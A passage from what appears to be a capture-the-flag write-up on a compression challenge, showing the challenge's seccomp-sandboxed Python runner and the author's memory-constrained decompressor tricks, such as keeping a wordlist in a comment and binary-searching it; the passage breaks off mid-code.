<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>3877984a12693cb20b2b77c7e762860280bc84ef44aafde858752c9dce39bcf0e4c86cdac74d2bb1468988d1118c63d550165e8755454caa104b7b8e6adb991d4f351549d3ac77f4136f6c9b6740bf11081d258a21e8e1e9280125fd5e107a631df314e0b723b8d29e9ee609fb4330c066542f71b70742ee2a38610a6d0521291c8282269d7cc878028eece218c883bc987b1bad6e3dccbec98b3df8527f03e0aa0626385607af26b3b0230adde31e7bf90d180128a94a5d550035fa4cf5e4c99b910b1a7b76da874ca41a05fa132943a7d7df507b9e31f3330a736380750302a597a3f8dcd22dbeeb331b8c80e590ff202e374c51d960bb020b2d9895037c08704f8068216c472f50888de8d384064640847124da1fb78aa83c41384a1ab168e7e220e1dea20032b1c0ed148d4050d1563c6e618dcb8c1fe4ec9bebfb7e484b93a4b5aaa50b643e58e1e1989c0092117dface8aa2913720d31f2bc944bc4da22882cf2de3b3c5e0bd1a968da0447900dfc1a1e11ea9787c13506072a312abee9546b50927af86101c99f81b2f22d8012dacba093281ade5d0e18ea16f52cbaa87a7423e116986995222993c91c927cf50a542e2f2c01d45977e90bd3548e10156bcf4d2b9a8f69a346227c58bdc0e878c98e75066a6e221cd9f3118b8d3f7369c8857a4b5c9d1cc41de79962495c579092c101432cf81991cd2a1c36169172a701844c242c7f9fc6d6cb153e4221249026db5e09da72ecf0417c911292a94910cae855da54a0a14cab2353eb7b90a242f464551806b44be1723379c244f9a683e6e440823c73be876a83e7f2d13e506c06e4b870243081217c1c128b4cf3452fcf52131371a914301de7fa329bfaa22b77def64523e3ae0012e0e4a772697c785d9a4d2166dcc04d95bdc9800f2ccc1732e5a9d31c39e80a622882bc0de58690e38ac9b2600b49891e724688c749484aaa6ff67d8e9c81097bdf4fb1ceb132f979476d6480cdbc3b07edd2501291772370a1e4e3c731f8d571972c9448992ac629c66409c9ea890629c8e00
</code></pre></div></div>
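
<p>The tail overhead can be estimated with a few lines of Python. This is only a sketch of the logic in <code class="language-plaintext highlighter-rouge">process_char</code>; the function name <code class="language-plaintext highlighter-rouge">tail_bytes</code> is hypothetical, and it assumes the input is exactly 2048 characters long:</p>

```python
TAIL_THRESHOLD = 2028  # from the C code: tail mode starts at the first space at or past this count
MESSAGE_LEN = 2048     # total input length checked in process_char


def tail_bytes(message):
    """Bytes spent on the raw tail: one per trailing character plus one padding byte."""
    assert len(message) == MESSAGE_LEN
    for i, ch in enumerate(message):
        # total_rx_count is incremented before the check, so index i is seen as count i + 1
        if ch == " " and i + 1 >= TAIL_THRESHOLD:
            return (MESSAGE_LEN - (i + 1)) + 1
    return 0  # no late space: tail mode never starts in this model


worst = "A" * 2027 + " " + "B" * 20
print(tail_bytes(worst))
```

<p>The worst case is a space arriving exactly as the 2028th character, which leaves 20 raw characters and the padding byte, or 21 bytes in total.</p>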

<h2 id="the-decompressor">The Decompressor</h2>

<p>When I first devised this algorithm, I didn’t really think about the decompressor much; I figured it would be easy to implement since we get to write Python code. Little did I know this would end up being the hardest part of the challenge.</p>

<p>The decompression code is run using a small stub called <code class="language-plaintext highlighter-rouge">decomp_runner.py</code>, which looks like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64decode</span>
<span class="kn">import</span> <span class="nn">resource</span>
<span class="kn">import</span> <span class="nn">pyseccomp</span>


<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">out</span><span class="p">):</span>
    <span class="k">exec</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="p">{</span><span class="s">'data'</span><span class="p">:</span> <span class="n">data</span><span class="p">,</span> <span class="s">'out'</span><span class="p">:</span> <span class="n">out</span><span class="p">})</span>


<span class="k">def</span> <span class="nf">sandbox</span><span class="p">():</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_CPU</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_FSIZE</span><span class="p">,</span> <span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">4096</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_AS</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_DATA</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">))</span>

    <span class="nb">filter</span> <span class="o">=</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">SyscallFilter</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ERRNO</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">errno</span><span class="p">.</span><span class="n">EPERM</span><span class="p">))</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'write'</span><span class="p">,</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">Arg</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">EQ</span><span class="p">,</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">fileno</span><span class="p">()))</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'exit_group'</span><span class="p">)</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'brk'</span><span class="p">)</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">load</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span>

    <span class="n">prog</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]).</span><span class="n">decode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">)</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
    <span class="n">out</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">([</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="mi">4096</span><span class="p">)</span>

    <span class="n">sandbox</span><span class="p">()</span>
    <span class="n">run</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>Our decompressor code is passed as a base64 blob on the command line, together with the compressor’s output (also base64-encoded). The runner installs tight CPU and memory limits (1 second of CPU time, 2 MiB of memory), then loads a very restrictive seccomp syscall filter which allows only <code class="language-plaintext highlighter-rouge">write(STDOUT_FILENO, ...)</code>, <code class="language-plaintext highlighter-rouge">exit_group</code> and <code class="language-plaintext highlighter-rouge">brk</code>; every other syscall fails with <code class="language-plaintext highlighter-rouge">EPERM</code>. Finally, the provided code is launched with <code class="language-plaintext highlighter-rouge">exec</code>, with <code class="language-plaintext highlighter-rouge">data</code> and <code class="language-plaintext highlighter-rouge">out</code> as its only globals.</p>
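
<p>For local testing, the two arguments can be prepared along these lines. This is a minimal sketch: <code class="language-plaintext highlighter-rouge">build_runner_args</code> is a made-up helper, the one-line program is a placeholder rather than a real decompressor, and actually launching the runner assumes a Linux host with <code class="language-plaintext highlighter-rouge">pyseccomp</code> installed:</p>

```python
import base64


def build_runner_args(prog_src, compressed):
    """Return the two base64 arguments that decomp_runner.py decodes from sys.argv."""
    # the runner decodes the program as ASCII, so non-ASCII source is rejected here
    prog_b64 = base64.b64encode(prog_src.encode("ascii")).decode("ascii")
    data_b64 = base64.b64encode(compressed).decode("ascii")
    return [prog_b64, data_b64]


# placeholder program: copies the first input byte into the output buffer
args = build_runner_args("out[0] = data[0]\n", bytes.fromhex("3877984a"))
print(args)
# To run it for real (not done here):
#   subprocess.run(["python3", "decomp_runner.py", *args])
```

<p>Because the program travels as a command-line argument, the size of the decompressor source (including any embedded word table) is limited by whatever argument length the host allows.</p>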

<p>My first decoder attempt looked like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wordmap</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">11</span><span class="p">:</span> <span class="s">"MS"</span><span class="p">,</span>
<span class="mi">31</span><span class="p">:</span> <span class="s">"MN"</span><span class="p">,</span>
<span class="mi">41</span><span class="p">:</span> <span class="s">"ME"</span><span class="p">,</span>
<span class="mi">51</span><span class="p">:</span> <span class="s">"MR"</span><span class="p">,</span>
<span class="mi">100</span><span class="p">:</span> <span class="s">"GS"</span><span class="p">,</span>
<span class="mi">121</span><span class="p">:</span> <span class="s">"MI"</span><span class="p">,</span>
<span class="c1"># [snip] #
</span><span class="mi">194085</span><span class="p">:</span> <span class="s">"OLYMPIC"</span><span class="p">,</span>
<span class="mi">195863</span><span class="p">:</span> <span class="s">"NIGHTLIFE"</span><span class="p">,</span>
<span class="mi">203640</span><span class="p">:</span> <span class="s">"HOMEWORK"</span><span class="p">,</span>
<span class="mi">205457</span><span class="p">:</span> <span class="s">"NETWORK"</span><span class="p">,</span>
<span class="mi">206123</span><span class="p">:</span> <span class="s">"BRUNSWICK"</span><span class="p">,</span>
<span class="p">}</span>

<span class="n">leet_table</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'A'</span><span class="p">:</span> <span class="s">'4'</span><span class="p">,</span>
    <span class="s">'B'</span><span class="p">:</span> <span class="s">'8'</span><span class="p">,</span>
    <span class="s">'E'</span><span class="p">:</span> <span class="s">'3'</span><span class="p">,</span>
    <span class="s">'G'</span><span class="p">:</span> <span class="s">'6'</span><span class="p">,</span>
    <span class="s">'I'</span><span class="p">:</span> <span class="s">'1'</span><span class="p">,</span>
    <span class="s">'O'</span><span class="p">:</span> <span class="s">'0'</span><span class="p">,</span>
    <span class="s">'S'</span><span class="p">:</span> <span class="s">'5'</span><span class="p">,</span>
    <span class="s">'T'</span><span class="p">:</span> <span class="s">'7'</span><span class="p">,</span>
    <span class="s">'Z'</span><span class="p">:</span> <span class="s">'2'</span>
<span class="p">}</span>

<span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">readbits</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">cur_bit</span><span class="p">,</span> <span class="n">cur_byte</span>
    <span class="n">res</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">resbits</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">while</span> <span class="n">resbits</span> <span class="o">&lt;</span> <span class="n">n</span><span class="p">:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">n</span> <span class="o">-</span> <span class="n">resbits</span>
        <span class="k">if</span> <span class="n">chunk</span> <span class="o">&gt;</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">:</span>
            <span class="n">chunk</span> <span class="o">=</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span>
        <span class="n">t</span> <span class="o">=</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">cur_byte</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="n">cur_bit</span><span class="p">)</span> <span class="o">&amp;</span> <span class="p">((</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">chunk</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">res</span> <span class="o">|=</span> <span class="n">t</span> <span class="o">&lt;&lt;</span> <span class="n">resbits</span>
        <span class="n">resbits</span> <span class="o">+=</span> <span class="n">chunk</span>
        <span class="n">cur_bit</span> <span class="o">+=</span> <span class="n">chunk</span>
        <span class="k">if</span> <span class="n">cur_bit</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
            <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span>
            <span class="n">cur_byte</span> <span class="o">+=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">res</span>

<span class="n">output</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">2028</span><span class="p">:</span>
    <span class="n">word</span> <span class="o">=</span> <span class="n">wordmap</span><span class="p">[</span><span class="n">readbits</span><span class="p">(</span><span class="mi">18</span><span class="p">)]</span>
    <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">word</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">leet_table</span><span class="p">:</span>
            <span class="n">is_leet</span> <span class="o">=</span> <span class="n">readbits</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">is_leet</span><span class="p">:</span>
                <span class="n">output</span> <span class="o">+=</span> <span class="n">leet_table</span><span class="p">[</span><span class="n">c</span><span class="p">]</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">output</span> <span class="o">+=</span> <span class="n">c</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">output</span> <span class="o">+=</span> <span class="n">c</span>
    <span class="n">output</span> <span class="o">+=</span> <span class="s">" "</span>

<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">2048</span><span class="p">:</span>
    <span class="n">output</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">readbits</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span>

<span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
</code></pre></div></div>

<p>This worked great in preliminary testing, but failed entirely when run on the actual scoring system. The script was being passed as a base64 blob on the command line and was <em>exceeding the maximum length of a single command-line argument</em>. Some experimentation showed that the default maximum length was 128KB (131072 bytes) for a single argument, which translates into 96KB before base64 encoding. Thankfully, our raw wordlist is around 60KB, so my next attempt looked something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wordlist</span> <span class="o">=</span> <span class="s">"""
THE
OF
AND
TO
A
[...]
CYLINDER
WITCH
BUCK
INDICATION
EH
"""</span><span class="p">.</span><span class="n">split</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">perfect_hash</span><span class="p">(</span><span class="n">w</span><span class="p">):</span>
  <span class="p">[...]</span>
<span class="n">wordmap</span> <span class="o">=</span> <span class="p">{</span><span class="n">perfect_hash</span><span class="p">(</span><span class="n">w</span><span class="p">):</span> <span class="n">w</span> <span class="k">for</span> <span class="n">w</span> <span class="ow">in</span> <span class="n">wordlist</span><span class="p">}</span>

<span class="p">[...]</span>
</code></pre></div></div>

<p>This runs, but immediately crashes before executing any code. Some debugging with <code class="language-plaintext highlighter-rouge">strace</code> revealed that Python was attempting to use the <code class="language-plaintext highlighter-rouge">mmap</code> system call to allocate memory to compile the program (in particular, allocating space for the <code class="language-plaintext highlighter-rouge">wordlist</code> constant). Unfortunately, only the <code class="language-plaintext highlighter-rouge">brk</code> system call has been permitted through the filter, so Python’s attempt to allocate memory fails and it throws a <code class="language-plaintext highlighter-rouge">MemoryError</code> while compiling the code for <code class="language-plaintext highlighter-rouge">exec</code>.</p>

<p>This is much more serious than it initially appears. Without the ability to <code class="language-plaintext highlighter-rouge">mmap</code> additional memory, we’re effectively limited to only the free memory that was available before the seccomp filter was installed - and that small amount of memory has to be enough for both the compiled program and all of the variables it creates as it runs. Some experimentation suggests that we have around 120KB of free memory. Keep in mind that Python objects are quite heavyweight: per <code class="language-plaintext highlighter-rouge">.__sizeof__()</code>, a simple integer is 28 bytes in size, while a single-character string is 50 bytes, and both sizes are likely underestimates due to padding and malloc metadata. I also did not immediately see a way to convince Python to use <code class="language-plaintext highlighter-rouge">brk</code> instead of <code class="language-plaintext highlighter-rouge">mmap</code> using pure Python code.</p>

<p>To get around this problem, I chose to <em>smuggle</em> the wordlist in a comment, which would not be compiled and would therefore not incur a significant memory cost. We can access the source code of our program, and thus the embedded wordlist, by walking the stack:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#THE,OF,AND,[...],BUCK,INDICATION,EH
</span><span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>
</code></pre></div></div>
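<p>To see the stack-walking trick in isolation, here is a minimal sketch. The <code class="language-plaintext highlighter-rouge">run</code> function is a hypothetical stand-in for the challenge runner (the only thing it shares with the real one is a local variable named <code class="language-plaintext highlighter-rouge">prog</code> holding the source), and the three-word comment is a toy wordlist:</p>

```python
def run(prog):
    """Hypothetical stand-in for the runner: exec source held in a local named prog."""
    scope = {}
    exec(prog, scope)
    return scope


# Toy payload: the first line is a comment carrying the "wordlist".
payload = (
    "#THE,OF,AND\n"
    "try:\n"
    "    1/0\n"
    "except Exception as e:\n"
    "    # Frame of this code, then the caller's frame (run), then its locals.\n"
    "    src = e.__traceback__.tb_frame.f_back.f_locals['prog']\n"
    "end = src.find('\\n')\n"
)

scope = run(payload)
# Slice the comment body out of the recovered source text.
recovered = scope["src"][1:scope["end"]]

# The comment never reaches the compiled code object's constants.
consts = compile(payload, "payload", "exec").co_consts
comment_compiled = any("THE,OF,AND" in str(c) for c in consts)

print(recovered, comment_compiled)
```

<p>The payload only stores an index into the source rather than a copy of the comment, which mirrors the constraint that the real decompressor cannot afford to duplicate the wordlist.</p>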

<p>However, we can’t even do something like <code class="language-plaintext highlighter-rouge">wordlist = prog.split("\n")[0].split(",")</code> due to the severe memory restrictions - 8192 strings will occupy at least 400KB (per <code class="language-plaintext highlighter-rouge">__sizeof__()</code>), far more than the roughly 100KB we have available.</p>
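<p>That estimate is easy to reproduce. The sketch below takes the word count from the text and measures the per-object size on whatever interpreter runs it; the exact byte counts are version-dependent (an assumption worth checking locally), and the result ignores allocator padding and the characters beyond the first in each word, so it is only a lower bound:</p>

```python
import sys

WORD_COUNT = 8192              # number of words, as stated in the text
BUDGET_BYTES = 120 * 1024      # rough free-memory figure quoted above

# Size of the smallest possible word object on this interpreter.
per_string = sys.getsizeof("A")
# Each list slot also stores one pointer to its string.
per_slot = sys.getsizeof([None]) - sys.getsizeof([])

lower_bound = WORD_COUNT * (per_string + per_slot)
print(f"at least {lower_bound // 1024} KiB for the split list")
print("fits in budget:", lower_bound <= BUDGET_BYTES)
```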

<p>Instead, I took the approach of dynamically searching the wordlist for each incoming word. To avoid an expensive linear search (which would blow our 1-second CPU limit), I sorted the wordlist by hash value, then implemented a binary search:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
</span>
<span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>

<span class="n">table</span> <span class="o">=</span> <span class="p">(</span><span class="mi">145</span><span class="p">,</span><span class="mi">22134</span><span class="p">,</span><span class="mi">14665</span><span class="p">,</span><span class="mi">7025</span><span class="p">,</span><span class="mi">20</span><span class="p">,</span><span class="mi">43498</span><span class="p">,</span><span class="mi">6070</span><span class="p">,</span><span class="mi">2551</span><span class="p">,</span><span class="mi">60</span><span class="p">,</span><span class="mi">13988</span><span class="p">,</span><span class="mi">38948</span><span class="p">,</span><span class="mi">1820</span><span class="p">,</span><span class="mi">30148</span><span class="p">,</span><span class="mi">15</span><span class="p">,</span><span class="mi">85</span><span class="p">,</span><span class="mi">6351</span><span class="p">,</span><span class="mi">5350</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">65</span><span class="p">,</span><span class="mi">555</span><span class="p">,</span><span class="mi">14565</span><span class="p">,</span><span class="mi">2027</span><span class="p">,</span><span class="mi">295</span><span class="p">,</span><span class="mi">735</span><span class="p">,</span><span class="mi">45643</span><span class="p">,</span><span class="mi">29266</span><span class="p">,</span><span class="mi">7705</span><span class="p">,</span><span class="mi">42888</span><span class="p">,</span><span class="mi">10966</span><span class="p">,</span><span class="mi">21</span><span class="p">,</span><span class="mi">4875</span><span class="p">,</span><span class="mi">325</span><span class="p">,</span><span class="mi">4725</span><span class="p">,</span><span class="mi">53578</span><span class="p">,</span><span class="mi">57958</span><span class="p">,</span><span class="mi">14261</span><span class="p">,</span><span 
class="mi">1220</span><span class="p">,</span><span class="mi">29394</span><span class="p">,</span><span class="mi">60128</span><span class="p">,</span><span class="mi">26679</span><span class="p">,</span><span class="mi">45243</span><span class="p">,</span><span class="mi">275</span><span class="p">,</span><span class="mi">2250</span><span class="p">,</span><span class="mi">1350</span><span class="p">,</span><span class="mi">23954</span><span class="p">,</span><span class="mi">585</span><span class="p">,</span><span class="mi">430</span><span class="p">,</span><span class="mi">90</span><span class="p">,</span><span class="mi">35098</span><span class="p">,</span><span class="mi">11101</span><span class="p">,</span><span class="mi">49537</span><span class="p">,</span><span class="mi">401</span><span class="p">,</span><span class="mi">51258</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">64213</span><span class="p">,</span><span class="mi">10636</span><span class="p">,</span><span class="mi">4410</span><span class="p">,</span><span class="mi">1945</span><span class="p">,</span><span class="mi">10338</span><span class="p">,</span><span class="mi">2786</span><span class="p">,</span><span class="mi">42248</span><span class="p">,</span><span class="mi">14110</span><span class="p">,</span><span class="mi">9063</span><span class="p">,</span><span class="mi">51277</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">1385</span><span class="p">,</span><span class="mi">330</span><span class="p">)</span>
<span class="n">offs</span> <span class="o">=</span> <span class="p">(</span><span class="mi">42</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">29</span><span class="p">,</span><span class="mi">13</span><span class="p">,</span><span class="mi">19</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">lookup</span><span class="p">(</span><span class="n">th</span><span class="p">):</span>
    <span class="n">lo</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">hi</span> <span class="o">=</span> <span class="mi">61828</span>
    <span class="k">while</span> <span class="n">lo</span> <span class="o">&lt;</span> <span class="n">hi</span><span class="p">:</span>
        <span class="n">mid</span> <span class="o">=</span> <span class="p">(</span><span class="n">lo</span> <span class="o">+</span> <span class="n">hi</span><span class="p">)</span> <span class="o">//</span> <span class="mi">2</span>
        <span class="n">a</span> <span class="o">=</span> <span class="n">prog</span><span class="p">.</span><span class="n">rfind</span><span class="p">(</span><span class="s">","</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">mid</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span>
        <span class="n">b</span> <span class="o">=</span> <span class="n">prog</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">","</span><span class="p">,</span> <span class="n">mid</span><span class="p">)</span>
        <span class="n">h</span> <span class="o">=</span> <span class="n">table</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">prog</span><span class="p">[</span><span class="n">b</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">-</span> <span class="mi">65</span><span class="p">]</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">b</span><span class="o">-</span><span class="n">a</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">offs</span><span class="p">):</span>
                <span class="n">h</span> <span class="o">+=</span> <span class="n">table</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">prog</span><span class="p">[</span><span class="n">a</span><span class="o">+</span><span class="n">i</span><span class="p">])</span> <span class="o">+</span> <span class="n">offs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="mi">65</span><span class="p">]</span>
        <span class="k">if</span> <span class="n">h</span> <span class="o">&lt;</span> <span class="n">th</span><span class="p">:</span>
            <span class="n">lo</span> <span class="o">=</span> <span class="n">mid</span> <span class="o">+</span> <span class="mi">1</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">hi</span> <span class="o">=</span> <span class="n">mid</span>
    <span class="k">return</span> <span class="n">lo</span>
</code></pre></div></div>
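<p>The same idea can be tried out on a small scale. In the sketch below, <code class="language-plaintext highlighter-rouge">toy_hash</code> is a hypothetical stand-in for the gperf-derived hash (it is simply the base-27 value of the word), and <code class="language-plaintext highlighter-rouge">blob</code> plays the role of <code class="language-plaintext highlighter-rouge">prog</code>. The search runs over character positions rather than word indices, so no list of words is ever built:</p>

```python
def toy_hash(word):
    # Hypothetical stand-in for the real perfect hash: base-27 value, A=1..Z=26.
    h = 0
    for ch in word:
        h = h * 27 + (ord(ch) - 64)
    return h


words = sorted(["THE", "OF", "AND", "TO", "A", "WITCH", "BUCK"], key=toy_hash)
# Same layout as the smuggled comment: leading "#,", words, trailing ",".
blob = "#," + ",".join(words) + ","


def lookup(blob, target):
    """Return the index of the first character of the word whose hash is target."""
    lo, hi = 2, len(blob) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        a = blob.rfind(",", 0, mid) + 1   # start of the word containing mid
        b = blob.find(",", mid)           # comma that terminates that word
        if toy_hash(blob[a:b]) < target:
            lo = mid + 1
        else:
            hi = mid
    return lo


def word_at(blob, pos):
    return blob[pos:blob.find(",", pos)]


print(word_at(blob, lookup(blob, toy_hash("THE"))))
```

<p>A comma is treated as belonging to the word before it, so the first position whose word hashes to at least the target is always the first character of the matching word. Unlike the real decoder, this sketch slices out each probed word as a short temporary string, which costs memory proportional to one word only.</p>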

<p>One final trick I used was to get a bit more memory by clearing <code class="language-plaintext highlighter-rouge">sys.argv</code>, thereby freeing the large base64-encoded version of the program and buying around 100KB of extra memory to work with. I needed to do this because compiling the program itself still required more memory than was available:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[:]</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">exec</span><span class="p">(</span><span class="sa">r</span><span class="s">"""
[rest of the program]
"""</span><span class="p">)</span>
</code></pre></div></div>

<p>Putting this all together produces the final decompressor:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="c1"># get ourselves just a little more memory to work with
</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[:]</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
